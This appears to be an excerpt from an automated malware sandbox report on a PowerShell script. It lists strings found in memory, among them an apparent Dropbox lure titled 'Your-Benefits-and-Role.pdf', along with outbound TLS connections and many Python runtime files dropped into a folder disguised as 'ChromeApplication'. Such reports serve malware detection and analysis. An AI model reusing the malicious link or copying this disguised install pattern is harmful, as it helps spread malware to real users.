Source: powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp, win32profile.pyd.0.dr, win32clipboard.pyd.0.dr, win32api.pyd.0.dr, win32pdh.pyd.0.drString found in binary or memory: https://github.com/mhammond/pywin32
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00DFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C011D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011CB000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395189100.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395294197.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000002.2398666851.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395538475.0000000000B31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000002.2397698654.0000000000990000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395047103.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000002.2398550995.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2492760613.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2492919476.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2495301973.00000000009B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: selectors.py.0.drString found in binary or memory: https://github.com/sethmlarson/selectors2/blob/master/selectors2.py
Source: test_OCB.py.0.drString found in binary or memory: https://gitlab.com/dkg/ocb-test-vectors
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: __init__.py28.0.drString found in binary or memory: https://json.org
Source: asn1.py.0.drString found in binary or memory: https://letsencrypt.org/docs/a-warm-welcome-to-asn1-and-der/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
Source: asn1.py.0.drString found in binary or memory: https://luca.ntop.org/Teaching/Appunti/asn1.html
Source: request.py.0.drString found in binary or memory: https://mahler:8092/site-updates.py
Source: asn1.py.0.drString found in binary or memory: https://misc.daniel-marschall.de/asn.1/oid-converter/online.php
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
Source: powershell.exe, 00000000.00000002.2443745513.0000015C10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: KDF.py.0.drString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
Source: encoder.py.0.dr, encoder.py2.0.dr, integer.py.0.dr, error.py1.0.dr, useful.py.0.drString found in binary or memory: https://pyasn1.readthedocs.io/en/latest/license.html
Source: synaptics.exe, synaptics.exe, 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp, synaptics.exe, 0000000E.00000002.2496158188.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
Source: client.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
Source: client.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
Source: pss.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc8017
Source: pss.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-67
Source: pss.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.1
Source: pss.py.0.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.2
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com/cd/0/get/CeYLvLikFX2y1znhZcHxMXpDXU5a
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmp, protected.ps1String found in binary or memory: https://www.dropbox.com/scl/fi/evu7c2vgbewx58xom0qaa/Your-Benefits-and-Role.pdf?rlkey=qa56drncavprj5
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
Source: platform.py.0.drString found in binary or memory: https://www.freedesktop.org/software/systemd/man/os-release.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01A90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01A83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ibm.com/
Source: KDF.py.0.drString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: asn1.py.0.drString found in binary or memory: https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf
Source: asn1.py.0.drString found in binary or memory: https://www.oss.com/asn1/resources/books-whitepapers-pubs/larmouth-asn1-book.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
Source: turtle.py.0.drString found in binary or memory: https://www.python.org)
Source: request.py.0.drString found in binary or memory: https://www.python.org/
Source: pydoc.py.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-%04d/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C019B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: synaptics.exe, 0000000E.00000002.2495840187.00000000013B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: synaptics.exe, 00000007.00000003.2377957976.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2378048439.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2492642413.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, site.cpython-310.pyc.10756912.7.drString found in binary or memory: https://www.python.org/psf/license/)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0131E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/lang_conflict.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.statisticshowto.com/probability-and-statistics/z-score/
Source: asn1.py.0.drString found in binary or memory: https://www.zytrax.com/tech/survival/asn1.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownHTTPS traffic detected: 202.92.4.57:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\python_tools.catJump to dropped file

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32inet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pipe.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\mmapfile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32job.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\adsi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32trace.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmon.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32process.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_win32sysloader.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\vcruntime140.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\odbc.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\timer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmondata.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32console.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32crypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ras.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32wnet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_msi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\winxpgui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\dde.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32file.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pdh.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32help.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32transaction.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32profile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\python310.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32print.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32api.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ts.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
